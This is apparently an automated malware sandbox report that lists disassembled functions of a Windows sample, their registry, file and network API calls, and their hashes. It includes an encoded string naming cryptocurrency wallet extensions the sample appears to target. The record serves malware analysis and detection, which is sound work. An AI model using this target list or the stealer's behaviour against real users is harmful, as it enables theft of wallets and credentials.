Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
String ID: %d MB$@
API String ID: 2922868504-3474575989
Opcode ID: 2476004de7bce0eb3c09f2372238fa04169d7a7313a395be1d9c6000f3a87cce
Instruction ID: b04b7ef606d20c9880270b91d908577ab63f6033797de79a3f6fcd2f735a8173
Opcode Fuzzy Hash: 2476004de7bce0eb3c09f2372238fa04169d7a7313a395be1d9c6000f3a87cce
Instruction Fuzzy Hash: CC2108B1E44209ABEB00DFD8DD49FAEB778FB49B14F104509F605BB680D77899008BA5

Function 00197E7C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON

Download Yara Rule

APIs

RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00197EC6
wsprintfA.USER32 ref: 00197EF9
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00197F1B
RegCloseKey.ADVAPI32(00000000), ref: 00197F2C
RegCloseKey.ADVAPI32(00000000), ref: 00197F39

Part of subcall function 0019A170: lstrcpy.KERNEL32(?,00000000), ref: 0019A1B6

RegQueryValueExA.KERNEL32(00000000,013ADD90,00000000,000F003F,?,00000400), ref: 00197F8C
lstrlen.KERNEL32(?), ref: 00197FA1
RegQueryValueExA.KERNEL32(00000000,013ADDD8,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,001A0B24), ref: 00198039
RegCloseKey.KERNEL32(00000000), ref: 001980A8
RegCloseKey.ADVAPI32(00000000), ref: 001980BA

Strings

%s\%s, xrefs: 00197EED

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
String ID: %s\%s
API String ID: 3896182533-4073750446
Opcode ID: 1e03bd627c799612a4dffd624f39b4428ac99a34acfc58dd01ef2f44bb28548f
Instruction ID: 8efe35e717f53b954c58c69799284da151e7be12d26992a64aab3a3105eea2ac
Opcode Fuzzy Hash: 1e03bd627c799612a4dffd624f39b4428ac99a34acfc58dd01ef2f44bb28548f
Instruction Fuzzy Hash: C621E975A1021CABDB24DB54DC85FD9B7B9FB48704F00C1A8A609A6180DF71AA85CFE4

Function 00184800 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 63stringnetworkCOMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT(00000800), ref: 0018483B
??_U@YAPAXI@Z.MSVCRT(00000800), ref: 00184852
??_U@YAPAXI@Z.MSVCRT(00000800), ref: 00184869
lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00184889
InternetCrackUrlA.WININET(00000000,00000000), ref: 00184899

Strings

<, xrefs: 00184819

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: CrackInternetlstrlen
String ID: <
API String ID: 1274457161-4251816714
Opcode ID: 19054d42c78a7110f6f76f8bff2c22d52cf71386cdcc68fad1b717d353cb7c7e
Instruction ID: dbb2c7c3f2d160d52de9e7761187b2060ba9cf67631142fe70eabf3a09b8d2cb
Opcode Fuzzy Hash: 19054d42c78a7110f6f76f8bff2c22d52cf71386cdcc68fad1b717d353cb7c7e
Instruction Fuzzy Hash: FD214CB1D00209ABDF14DFA4EC49ADE7B79FF45320F508625F915A7290EB706A09CB81

Function 00197130 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00197144
RtlAllocateHeap.NTDLL(00000000), ref: 0019714B
RegOpenKeyExA.KERNEL32(80000002,0139BB60,00000000,00020119,00000000), ref: 0019717D
RegQueryValueExA.KERNEL32(00000000,013ADD60,00000000,00000000,?,000000FF), ref: 0019719E
RegCloseKey.ADVAPI32(00000000), ref: 001971A8

Strings

Windows 11, xrefs: 0019715D

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID: Windows 11
API String ID: 3225020163-2517555085
Opcode ID: 80676e02bbf4f58a3f1cd875ce15648d24d02a698aed68cf73ff48f280b6c544
Instruction ID: 41a24382f95d528201f1a4f36d3d5fd1790f7e1800b1cf3b0f41d36e711af6d5
Opcode Fuzzy Hash: 80676e02bbf4f58a3f1cd875ce15648d24d02a698aed68cf73ff48f280b6c544
Instruction Fuzzy Hash: 3C016275A14208BFEB04DBE4DD49FAEB7BCEF09700F104054FA0997280DB709A04CB50

Function 001971C0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 001971D4
RtlAllocateHeap.NTDLL(00000000), ref: 001971DB
RegOpenKeyExA.KERNEL32(80000002,0139BB60,00000000,00020119,00197159), ref: 001971FB
RegQueryValueExA.KERNEL32(00197159,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0019721A
RegCloseKey.ADVAPI32(00197159), ref: 00197224

Strings

CurrentBuildNumber, xrefs: 00197211

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID: CurrentBuildNumber
API String ID: 3225020163-1022791448
Opcode ID: ff984a35db46d69e4d015c6b198a7da0c5e73bfcbcd085759249e1eba311deec
Instruction ID: 82c7261b069df6d29654bbdfa14a585cb7d6f5e580f967893f4014617b5fff52
Opcode Fuzzy Hash: ff984a35db46d69e4d015c6b198a7da0c5e73bfcbcd085759249e1eba311deec
Instruction Fuzzy Hash: E301FFB9A50308BFDB11DBE4DC4AFAEB77CEB09700F104558FA05A7281DB71AA048B51

Function 00193BC0 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00193BE5
RegOpenKeyExA.KERNEL32(80000001,013AD478,00000000,00020119,?), ref: 00193C04
RegQueryValueExA.ADVAPI32(?,013ADEB0,00000000,00000000,00000000,000000FF), ref: 00193C28
RegCloseKey.ADVAPI32(?), ref: 00193C32
lstrcat.KERNEL32(?,00000000), ref: 00193C57
lstrcat.KERNEL32(?,013ADE68), ref: 00193C6B

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: lstrcat$CloseOpenQueryValuememset
String ID:
API String ID: 2623679115-0
Opcode ID: 6b386c9d5b098eb0cc5fd8940bc3107e973fc29771b1dc43ab1c790c9081189d
Instruction ID: 22a5801caddd621b672aceaa2320da812a8e57cd6d2046224e6c7f72966e8ac1
Opcode Fuzzy Hash: 6b386c9d5b098eb0cc5fd8940bc3107e973fc29771b1dc43ab1c790c9081189d
Instruction Fuzzy Hash: F641A7B69101086BDB19FBA0EC46FEE733DAB9A300F40495CB61A57181EFB5578C8BD1

Function 00189A10 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00189A3C
GetFileSizeEx.KERNEL32(000000FF,?), ref: 00189A61
LocalAlloc.KERNEL32(00000040,?), ref: 00189A81
ReadFile.KERNEL32(000000FF,?,00000000,0018148F,00000000), ref: 00189AAA
LocalFree.KERNEL32(0018148F), ref: 00189AE0
FindCloseChangeNotification.KERNEL32(000000FF), ref: 00189AEA

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: File$Local$AllocChangeCloseCreateFindFreeNotificationReadSize
String ID:
API String ID: 1815715184-0
Opcode ID: a59b0a8d1c3104fd5da2d0167d45d2381f3601891d009b3e81fb330da5c4b481
Instruction ID: 055328b7daa55e9c6e37d82d29b17a04b24a275a9476dae52d653465391df18e
Opcode Fuzzy Hash: a59b0a8d1c3104fd5da2d0167d45d2381f3601891d009b3e81fb330da5c4b481
Instruction Fuzzy Hash: 9B31FC74A00209EFDB18DF94C885BAE7BB9FF49304F148158F911AB290D774AA41CFA1

Function 00194260 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(?,013ADF40), ref: 001942BB

Part of subcall function 00198880: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 001988AB

lstrcat.KERNEL32(?,00000000), ref: 001942E1
lstrcat.KERNEL32(?,?), ref: 00194300
lstrcat.KERNEL32(?,?), ref: 00194314
lstrcat.KERNEL32(?,0139B130), ref: 00194327
lstrcat.KERNEL32(?,?), ref: 0019433B
lstrcat.KERNEL32(?,013AD4F8), ref: 0019434F

Part of subcall function 0019A110: lstrcpy.KERNEL32(001A0DFF,00000000), ref: 0019A158

Part of subcall function 00198830: GetFileAttributesA.KERNEL32(00000000,?,00181B94,?,?,001A554C,?,?,001A0E07), ref: 0019883F

Part of subcall function 00194050: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00194060
Part of subcall function 00194050: RtlAllocateHeap.NTDLL(00000000), ref: 00194067
Part of subcall function 00194050: wsprintfA.USER32 ref: 00194086
Part of subcall function 00194050: FindFirstFileA.KERNEL32(?,?), ref: 0019409D

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
String ID:
API String ID: 2540262943-0
Opcode ID: 6ffc5bbd0d5484ef100492dfd517c73b5723f26b63811d59930112af015eb403
Instruction ID: 8a7ac91a9338681fd9d3baad84d811cabee560a5f869b580bb2e722f5fbe6588
Opcode Fuzzy Hash: 6ffc5bbd0d5484ef100492dfd517c73b5723f26b63811d59930112af015eb403
Instruction Fuzzy Hash: C33193B2910218A7CF14FBA0DC85EED773CAF69304F808589B60697041EFB49788CFA4

Function 00196593 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30sleepCOMMON

Download Yara Rule

APIs

OpenEventA.KERNEL32(rcGhubHBvaGdsbmdtYmNjbGhpfDF8MHwwfFh2ZXJzZSBXYWxsZXR8aWRubmJkcGxtcGhwZmxmbmxrb21ncGZicGNnZWxvcGd8MXwwfDB8Q29tcGFzcyBXYWxsZXQgZm9yIFNlaXxhbm9rZ21waG5jcGVra2hjbG1pbmdwaW1qbWNvb2lmYnwxfDB8MHxIQVZBSCBXYWxsZXR8Y25uY21kaGphY3BrbWpta2NhZmNocHBibnBuaGRtb258MXwwfDB8RWx,00000000,00000000,00000000,?,013A8A60,?,001A10DC,?,00000000,?,001A10E0,?,00000000,001A0ADA), ref: 0019656A
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00196588
CloseHandle.KERNEL32(00000000), ref: 00196599
Sleep.KERNEL32(00001770), ref: 001965A4
CloseHandle.KERNEL32(?,00000000,?,013A8A60,?,001A10DC,?,00000000,?,001A10E0,?,00000000,001A0ADA), ref: 001965BA
ExitProcess.KERNEL32 ref: 001965C2

Strings

